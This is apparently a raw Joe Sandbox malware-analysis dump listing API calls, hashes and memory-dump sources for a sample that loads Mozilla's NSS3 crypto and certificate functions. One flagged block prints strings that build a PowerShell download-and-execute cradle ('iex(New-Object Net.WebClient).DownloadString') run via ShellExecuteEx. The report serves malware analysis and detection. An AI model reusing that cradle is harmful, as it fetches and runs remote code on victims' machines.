                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?,?,00000000,?,?), ref: 6CB00CB3
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?), ref: 6CB00DC1
                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?), ref: 6CB00DEC
                                                                                                                                                                                                                • Part of subcall function 6CB20F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CAC2AF5,?,?,?,?,?,6CAC0A1B,00000000), ref: 6CB20F1A
                                                                                                                                                                                                                • Part of subcall function 6CB20F10: malloc.MOZGLUE(00000001), ref: 6CB20F30
                                                                                                                                                                                                                • Part of subcall function 6CB20F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB20F42
                                                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?), ref: 6CB00DFF
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CB01444,?,00000001,?,00000000), ref: 6CB00E16
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?), ref: 6CB00E53
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?,?,00000000), ref: 6CB00E65
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?), ref: 6CB00E79
                                                                                                                                                                                                                • Part of subcall function 6CB11560: TlsGetValue.KERNEL32(00000000,?,6CAE0844,?), ref: 6CB1157A
                                                                                                                                                                                                                • Part of subcall function 6CB11560: EnterCriticalSection.KERNEL32(?,?,?,6CAE0844,?), ref: 6CB1158F
                                                                                                                                                                                                                • Part of subcall function 6CB11560: PR_Unlock.NSS3(?,?,?,?,6CAE0844,?), ref: 6CB115B2
                                                                                                                                                                                                                • Part of subcall function 6CADB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CAE1397,00000000,?,6CADCF93,5B5F5EC0,00000000,?,6CAE1397,?), ref: 6CADB1CB
                                                                                                                                                                                                                • Part of subcall function 6CADB1A0: free.MOZGLUE(5B5F5EC0,?,6CADCF93,5B5F5EC0,00000000,?,6CAE1397,?), ref: 6CADB1D2
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CAD88AE,-00000008), ref: 6CAD8A04
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: EnterCriticalSection.KERNEL32(?), ref: 6CAD8A15
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: memset.VCRUNTIME140(6CAD88AE,00000000,00000132), ref: 6CAD8A27
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: PR_Unlock.NSS3(?), ref: 6CAD8A35
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1601681851-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CAD8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CAE0715), ref: 6CAD8859
                                                                                                                                                                                                                • Part of subcall function 6CAD8850: PR_NewLock.NSS3 ref: 6CAD8874
                                                                                                                                                                                                                • Part of subcall function 6CAD8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CAD888D
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD9CAD
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD9CE8
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CADECEC,6CAE2FCD,00000000,?,6CAE2FCD,?), ref: 6CAD9D01
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CADECEC,6CAE2FCD,00000000,?,6CAE2FCD,?), ref: 6CAD9D38
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CADECEC,6CAE2FCD,00000000,?,6CAE2FCD,?), ref: 6CAD9D4D
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD9D70
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD9DC3
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD9DDD
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CAE0725,00000000,00000058), ref: 6CAD8906
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: EnterCriticalSection.KERNEL32(?), ref: 6CAD891A
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CAD894A
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: calloc.MOZGLUE(00000001,6CAE072D,00000000,00000000,00000000,?,6CAE0725,00000000,00000058), ref: 6CAD8959
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8993
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: PR_Unlock.NSS3(?), ref: 6CAD89AF
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3394263606-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9EC0
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9EF9
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBD9F73
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9FA5
                                                                                                                                                                                                              • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CBD9FCF
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBD9FF2
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBDA01D
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1904992153-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CACDCFA
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CACDD40
                                                                                                                                                                                                              • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CACDD62
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CACDD71
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CACDD81
                                                                                                                                                                                                              • CERT_RemoveCertListNode.NSS3(?), ref: 6CACDD8F
                                                                                                                                                                                                                • Part of subcall function 6CAE06A0: TlsGetValue.KERNEL32 ref: 6CAE06C2
                                                                                                                                                                                                                • Part of subcall function 6CAE06A0: EnterCriticalSection.KERNEL32(?), ref: 6CAE06D6
                                                                                                                                                                                                                • Part of subcall function 6CAE06A0: PR_Unlock.NSS3 ref: 6CAE06EB
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CACDD9E
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CACDDB7
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 653623313-0
                                                                                                                                                                                                              • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                              • Instruction ID: 2d80d321d43597207e97a6b036c0cf32d020ae0cc6bcd1d583469090ee904a2d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96218EB6F421299BDF029EA4DD409DFB7B4AF05318B190024E818A7701F721E999CBE3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,6CB3460B,?,?), ref: 6CAC3CA9
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAC3CB9
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?), ref: 6CAC3CC9
                                                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAC3CD6
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAC3CE6
                                                                                                                                                                                                              • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CAC3CF6
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAC3D03
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAC3D15
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1376842649-0
                                                                                                                                                                                                              • Opcode ID: 2e1fd769c5860c84bd61ba8315d1713d720a1fd7c1cfc78decb35d9c832b7407
                                                                                                                                                                                                              • Instruction ID: a136ce525e7e387379b66c56f5ce98cfc3ca2b1b2ffc739484121331ba0e8c3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e1fd769c5860c84bd61ba8315d1713d720a1fd7c1cfc78decb35d9c832b7407
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C1120B5F51505ABDB011635ED058EA7B78EB0226CB284530ED1C53B11FB22DD98C6D2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CAE11C0: PR_NewLock.NSS3 ref: 6CAE1216
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAC9E17
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC9E25
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC9E4E
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAC9EA2
                                                                                                                                                                                                                • Part of subcall function 6CAD9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CAD9546
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAC9EB6
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAC9ED9
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CAC9F18
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3381623595-0
                                                                                                                                                                                                              • Opcode ID: 47238ebe10652db26f429c371575fa11929096def802ca0dba9fb488a0e6f895
                                                                                                                                                                                                              • Instruction ID: 5b6d1d314b4af23c4ce27a7d83c9927161927a3451f44b2fd21098c5aeba2d29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47238ebe10652db26f429c371575fa11929096def802ca0dba9fb488a0e6f895
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9981E5B1B007019BEB019F34DE41AABB7B9BF5424CF194528E85987B01FB31E998C792
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: DeleteCriticalSection.KERNEL32(D958E852,6CAE1397,5B5F5EC0,?,?,6CADB1EE,2404110F,?,?), ref: 6CADAB3C
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: free.MOZGLUE(D958E836,?,6CADB1EE,2404110F,?,?), ref: 6CADAB49
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: DeleteCriticalSection.KERNEL32(5D5E6CCD), ref: 6CADAB5C
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: free.MOZGLUE(5D5E6CC1), ref: 6CADAB63
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CADAB6F
                                                                                                                                                                                                                • Part of subcall function 6CADAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CADAB76
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CADDCFA
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6CADDD0E
                                                                                                                                                                                                              • PK11_IsFriendly.NSS3(?), ref: 6CADDD73
                                                                                                                                                                                                              • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CADDD8B
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CADDE81
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CADDEA6
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CADDF08
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 519503562-0
                                                                                                                                                                                                              • Opcode ID: b312b79ebe205ee1f738b5109cf60af6d09c7720d62b94072882ef46f46c086f
                                                                                                                                                                                                              • Instruction ID: 2f4bf632817458750abce53ac99e3fe67b84ae501e4041b3fa1c37795c8d9cc1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b312b79ebe205ee1f738b5109cf60af6d09c7720d62b94072882ef46f46c086f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E791B4B5E011059FDB00CF68C981BAABBB5BF54308F1A4029D8199B741EB31F995CFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __allrem
                                                                                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAEDF37
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAEDF4B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAEDF96
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CAEE02B
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAEE07E
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAEE090
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAEE0AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 00932F00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ')", xrefs: 00932E53
                                                                                                                                                                                                              • C:\ProgramData\, xrefs: 00932DE3
                                                                                                                                                                                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00932E58
                                                                                                                                                                                                              • .ps1, xrefs: 00932E33
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00932E9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CB0AB3E,?,?,?), ref: 6CB0AC35
                                                                                                                                                                                                                • Part of subcall function 6CAECEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAECF16
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CB0AB3E,?,?,?), ref: 6CB0AC55
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CB0AB3E,?,?), ref: 6CB0AC70
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: TlsGetValue.KERNEL32 ref: 6CAEE33C
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: EnterCriticalSection.KERNEL32(?), ref: 6CAEE350
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: PR_Unlock.NSS3(?), ref: 6CAEE5BC
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CAEE5CA
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: TlsGetValue.KERNEL32 ref: 6CAEE5F2
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: EnterCriticalSection.KERNEL32(?), ref: 6CAEE606
                                                                                                                                                                                                                • Part of subcall function 6CAEE300: PORT_Alloc_Util.NSS3(?), ref: 6CAEE613
                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CB0AC92
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB0AB3E), ref: 6CB0ACD7
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CB0AD10
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CB0AD2B
                                                                                                                                                                                                                • Part of subcall function 6CAEF360: TlsGetValue.KERNEL32(00000000,?,6CB0A904,?), ref: 6CAEF38B
                                                                                                                                                                                                                • Part of subcall function 6CAEF360: EnterCriticalSection.KERNEL32(?,?,?,6CB0A904,?), ref: 6CAEF3A0
                                                                                                                                                                                                                • Part of subcall function 6CAEF360: PR_Unlock.NSS3(?,?,?,?,6CB0A904,?), ref: 6CAEF3D3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CAE8C7C
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAE8CB0
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAE8CD1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAE8CE5
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAE8D2E
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CAE8D62
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAE8D93
Memory Dump Source
• Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
• Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3131193014-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CB29C5B), ref: 6CB29D82
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CB29C5B), ref: 6CB29DA9
                                                                                                                                                                                                                • Part of subcall function 6CB21340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB2136A
                                                                                                                                                                                                                • Part of subcall function 6CB21340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB2137E
                                                                                                                                                                                                                • Part of subcall function 6CB21340: PL_ArenaGrow.NSS3(?,6CABF599,?,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?), ref: 6CB213CF
                                                                                                                                                                                                                • Part of subcall function 6CB21340: PR_Unlock.NSS3(?,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB2145C
                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CB29C5B), ref: 6CB29DCE
                                                                                                                                                                                                                • Part of subcall function 6CB21340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000,?,6CABF599,?,00000000), ref: 6CB213F0
                                                                                                                                                                                                                • Part of subcall function 6CB21340: PL_ArenaGrow.NSS3(?,6CABF599,?,?,?,00000000,00000000,?,6CAC895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CB21445
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,6CB29C5B), ref: 6CB29DDC
